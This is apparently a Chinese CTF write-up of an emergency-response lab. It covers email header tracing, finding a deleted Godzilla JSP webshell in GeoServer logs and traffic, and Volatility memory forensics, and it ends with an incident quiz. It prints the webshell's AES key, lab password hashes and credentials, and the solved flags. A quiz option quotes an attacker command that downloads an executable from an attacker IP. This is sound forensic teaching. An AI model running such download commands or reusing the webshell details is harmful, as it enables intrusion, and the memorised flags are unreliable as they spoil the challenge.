应急响应靶场应急响应-第一届solar
At4ckxuhttps://mp.weixin.qq.com/s/kMvwfBJgd7ugaWzm5U-5Ww
https://www.cnblogs.com/agonysec/p/18663408/the-first-solar-cup-emergency-response-challenge-part-wp-zvl0ij
签到
本题作为签到题,请给出邮服发件顺序。 Received: from mail.da4s8gag.com ([140.143.207.229]) by newxmmxszc6-1.qq.com (NewMX) with SMTP id 6010A8AD for ; Thu, 17 Oct 2024 11:24:01 +0800 X-QQ-mid: xmmxszc6-1t1729135441tm9qrjq3k X-QQ-XMRINFO: NgToQqU5s31XQ+vYT/V7+uk= Authentication-Results: mx.qq.com; spf=none smtp.mailfrom=; dkim=none; dmarc=none(permerror) header.from=solar.sec Received: from mail.solar.sec (VM-20-3-centos [127.0.0.1]) by mail.da4s8gag.com (Postfix) with ESMTP id 2EF0A60264 for ; Thu, 17 Oct 2024 11:24:01 +0800 (CST) Date: Thu, 17 Oct 2024 11:24:01 +0800 To: hellosolartest@qq.com From: 鍏嬪競缃戜俊 Subject:xxxxxxxxxx Message-Id: <20241017112401.032146@mail.solar.sec> X-Mailer: QQMail 2.x XXXXXXXXXX flag格式为flag{domain1|...|domainN}
|
flag{mail.solar.sec|mail.da4s8gag.com|newxmmxszc6-1.qq.com}
每经过一台邮件服务器,就会在“最上面”新增一条 Received
所以:
最下面的 Received = 最早(邮件起点)
最上面的 Received = 最后(收件服务器)
数据库
日志流量
环境

日志流量 题目文件:tomcat-wireshark.zip/web 日志流量-1 新手运维小王的Geoserver遭到了攻击: 黑客疑似删除了webshell后门,小王找到了可能是攻击痕迹的文件但不一定是正确的,请帮他排查一下。 flag格式 flag{xxxx} 日志流量-2 新手运维小王的Geoserver遭到了攻击: 小王拿到了当时被入侵时的流量,其中一个IP有访问webshell的流量,已提取部分放在了两个pcapng中了。请帮他解密该流量。 flag格式 flag{xxxx} 日志流量-3 新手运维小王的Geoserver遭到了攻击: 小王拿到了当时被入侵时的流量,黑客疑似通过webshell上传了文件,请看看里面是什么。 flag格式 flag{xxxx}
|
web日志分析-查询后门
存在web日志与流量包
分析web日志
攻击者从15/Dec/2024:23:02:33开始进行了大量的目录扫描,ip为10.0.100.22
web日志大多数都为404的目录扫描

扫描到/geoserver/index.html

并在15/Dec/2024:23:14:11扫描到/geoserver/login

并且成功登录进入后台

第一次尝试上传文件

上传功能点文件路径:/test/file.shp,上传文件为b.jsp,响应500,未成功上传
最后上传文件b.jsp,上传功能点文件路径为atk/file.shp,响应202,上传成功

访问对应目录,发现不存在该文件,根据题目提示可能为攻击者删除了该文件

攻击者上传jsp文件后,删除该文件,排查思路
当访问 JSP 页面时,Tomcat 会将 JSP 编译为 Java → 再编译为 .class,默认生成目录为:$CATALINA_BASE/work/Catalina/<host>/<webapp>/org/apache/jsp/,比如:/apache-tomcat-9.0.96/work/Catalina/localhost/ROOT/org/apache/jsp/b_jsp.class,当上传目录中的恶意文件被删除时,我们需要排查攻击者执行恶意文件时加载的类和java源码(jsp编译缓存目录$CATALINA_HOME/work/Catalina/)
查看缓存目录,存在执行b.jsp文件生成的缓存java文件和加载的class文件

AI对该文件的解释:
该文件是Apache Tomcat编译生成的JSP servlet类文件(对应原始JSP页面b.jsp),生成时间为2024-12-16 09:23:36 UTC。文件结构基于标准JSP框架,但嵌入可疑代码,构成安全风险。
攻击者上传的文件: b.jsp ↓(首次访问) Tomcat 自动生成: b_jsp.java ↓(编译) Tomcat 自动生成: b_jsp.class / b_jsp$X.class
|
JSP 本质就是“写在 HTML 里的 Java 代码”,tomcat在处理jsp时,会将jsp中的脚本代码(<% %>中的内容)原样编译成Java Servlet
其中部分代码为jsp的原封不动的脚本代码,部分代码为tomcat加载的代码

存在静态特征:base64、xc关键字、aes关键字,哥斯拉aes马,确认攻击者后门
https://cloud.tencent.com/developer/article/2287311

code参数为base64,解码

f!l^a*g{A7b4_X9zK_2v8N_wL5q4}
|
流量分析-访问文件
筛选http

追踪http流



为哥斯拉三次请求建立连接
加密方式为aes_raw,密钥为代码中xc的参数a2550eeab0724a69,密码默认pass

解密哥斯拉流量

我们解密请求体和响应体


依次对请求响应数据进行解密





flag{sA4hP_89dFh_x09tY_lL4SI4}
|
定位的是7230这个数据包

流量分析-上传文件
继续分析流,发现上传了flag.pdf文件

工具解密后会自动生成GodzillaRequestDecode.bin文件,查看文件


文件另存为pdf


查看该pdf

flag{dD7g_jk90_jnVm_aPkcs}
|
内存取证
内存取证 题目文件:SERVER-2008-20241220-162057 内存取证-1 请找到rdp连接的跳板地址 flag格式 flag{1.1.1.1} 内存取证-2 请找到攻击者下载黑客工具的IP地址 flag格式 flag{1.1.1.1} 内存取证-3 攻击者获取的“FusionManager节点操作系统帐户(业务帐户)”的密码是什么 flag格式 flag{xxxx} 内存取证-4 请找到攻击者创建的用户 flag格式 flag{xxxx} 内存取证-5 请找到攻击者利用跳板rdp登录的时间 flag格式 flag{2024/01/01 00:00:00} 内存取证-6 请找到攻击者创建的用户的密码哈希值 flag格式 flag{XXXX}
|
查看image
python2 vol.py -f SERVER-2008-20241220-162057.raw imageinfo
|
Win7SP1x64
rdp连接的跳板地址
查看网络连接情况,rdp端口3389,查看3389端口连接信息

本机 192.168.60.150 的 3389 端口,当前正与 192.168.60.220:34121 建立着一个已建立(ESTABLISHED)的 TCP 连接。
192.168.60.220 正在通过 RDP 连接这台主机。
跳板地址192.168.60.220
攻击者下载黑客工具的IP地址
查看历史cmd
python2 vol.py -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 cmdscan
|

155.94.204.67
“FusionManager节点操作系统帐户(业务帐户)”的密码
cmd中查看了pass.txt

查找pass.txt
python2 vol.py -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 filescan | grep "pass.txt"
|

0x000000007e4cedd0
dump文件
python2 vol.py -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000007e4cedd0 -D ./
|
查看文件

GalaxManager_2012
创建的用户
查看windows安全日志文件:Security.evtx
python2 vol.py -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 filescan | grep "Security.evtx"
|

dump日志文件

修改文件后缀为evtx,并使用事件查看器打开

查看事件id4720,找到创建用户

创建了用户ASP.NET,时间为2024/12/21 0:14:42
ASP.NET
利用跳板rdp登录的时间
查看日志中4624,并且登录名为ASP.NET

2024/12/21 0:15:34
创建的用户的密码哈希值
hashdump查看hash
python2 vol.py -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 hashdump
|

5ffe97489cbec1e08d0c6339ec39416d
综合应急
综合应急 题目文件:FOG日志 综合应急-1 题目类型为选择题,提交机会只有一次,请慎重提交。 1.哪台服务器是最先沦陷的?(计算机名) A.sql01 B.sql02 C.web01 D.dc02 2.攻击者创建了一个恶意的程序集,程序集名为? A.Classlibarry3 B.CmdExec C.Classlibarry1 D.Classlibarry2 3.攻击者利用程序集第一次执行的命令是什么? A.powershell -c iwr -uri http://10.0.100.85:81/2.exe -o C:/windows/tasks/2.exe B.powershell -c C:/windows/tasks/2.exe C.cmd.exe /c powershell -c C:/windows/tasks/2.exe D.cmd.exe /c powershell -c iwr -uri http://10.0.100.85:81/2.exe -o C:/windows/tasks/2.exe 4.攻击者新建的用户是什么? A.administrator B.admin C.test$ D.sql01 5.攻击者第一次远程登陆的用户是什么? A.administrator B.admin C.test$ D.sql01 6.攻击者的计算机名是什么? A.Kali B.sql01 C.sql02 D.dc02 7.攻击者第一次登陆第二台沦陷服务器数据库使用了什么账户? A.administrator B.sql01 C.sql02 D.admin 8.攻击者在第二台服务器上传并执行了木马,紧接着修改了系统的什么的配置? A.防火墙 B.Defender C.服务 D.定时任务 9.攻击者可能通过什么漏洞横向到第三台沦陷的服务器? A.命令执行 B.文件上传 C.弱口令 D.文件上传+文件读取 10.攻击者通过应用的漏洞获取了第三台沦陷的服务器权限,该权限用户安全 ID为? A.S-1-5-21-1687412249-3843849720-271823590-1106 B.S-1-5-21-1687412249-3843849720-271823590-500 C.S-1-5-21-1687412249-3843849720-271823590-1001 D.S-1-5-21-1687412249-3843849720-271823590-1100 11.攻击者紧接着调用了一个powershell脚本,该脚本的作用是什么? A.横向渗透 B.读取凭据 C.远控 D.信息收集 12.攻击者利用了什么工具使web01和dc02进行交互? A.SpoolSample.exe B.impacket-ntlmrelayx C.Smbclient D.printerbug.py 13.攻击者使用什么漏洞获取dc02的票据(多选) A.CVE-2021-1675 B.无约束委派 C.约束委派 D.MS14-025 14.攻击者使用什么漏洞获取dc03的票据(多选) A.CVE-2021-1675 B.约束委派 C.无约束委派 D.MS14-025 15.攻击者ip是什么? A.10.0.10.41 B.10.0.100.38 C.10.0.10.40 D.10.0.100.85 16.攻击者在第一台服务器执行过一个powershell的脚本,该脚本的名称是什么? A.pv.ps1 B.powerview.ps1 C.run.ps1 D.Powermad.ps1 17.对第三台沦陷的服务器发起漏洞攻击的IP是什么? A.10.0.10.41 B.10.0.100.38 C.10.0.10.40 D.10.0.100.85 18.攻击者什么时候修改了web01的管理员账号密码? A.24/12/18 9:59:44.000 B.24/12/18 9:57:42.000 B.24/12/18 9:50:00.000 B.24/12/18 10:08:12.000 19.dc02是一台拥有双网卡的服务器,他的ip分别是?(多选) A.10.0.100.22 B.10.0.11.6 C.10.0.11.7 D.10.0.10.43 20.该企业有三个域,请问这三个域的域名分别是什么?(多选) A.set.local B.sub.set.com C.set.com D.solar.com 21.以下哪些描述正确地反映了这些域之间的信任关系?(多选) A. 林1主域与林1子域之间存在双向信任关系 B. 林1子域可以信任林1主域,但林1主域不能信任林1子域 C. 林2主域与林1子域之间存在双向信任关系 D. 林2主域与林1子域之间不存在信任关系 22.攻击者在获取dc03之后,可能还攻击了哪些服务器?(多选) A.10.0.11.10 B.10.0.11.11 C.10.0.11.8 D.10.0.11.236 综合应急-2 攻击者上传了代理工具,请写出他的最终存放路径 格式为flag{x:\xxxxx\xxxx\xxxxxx}
|